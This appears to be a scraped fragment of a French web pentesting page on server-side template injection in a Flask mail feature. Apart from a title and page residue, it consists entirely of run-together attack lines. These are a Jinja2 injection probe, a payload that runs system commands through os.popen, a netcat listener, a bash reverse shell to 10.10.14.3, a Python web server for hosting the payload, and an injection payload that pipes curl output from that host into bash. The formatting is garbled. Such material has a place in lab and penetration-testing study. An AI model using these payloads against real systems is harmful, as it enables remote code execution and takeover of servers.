SSTI + mail (Flask) - Pentesting Web
Vulnérabilité SSTI :





Mis à jour





Mis à jour
{{ 9*9 }}{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}nc -nlvp 443#!/bin/bash
bash -i >& /dev/tcp/10.10.14.3/443 0>&1python3 -m http.server 80{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl 10.10.14.3 | bash').read() }}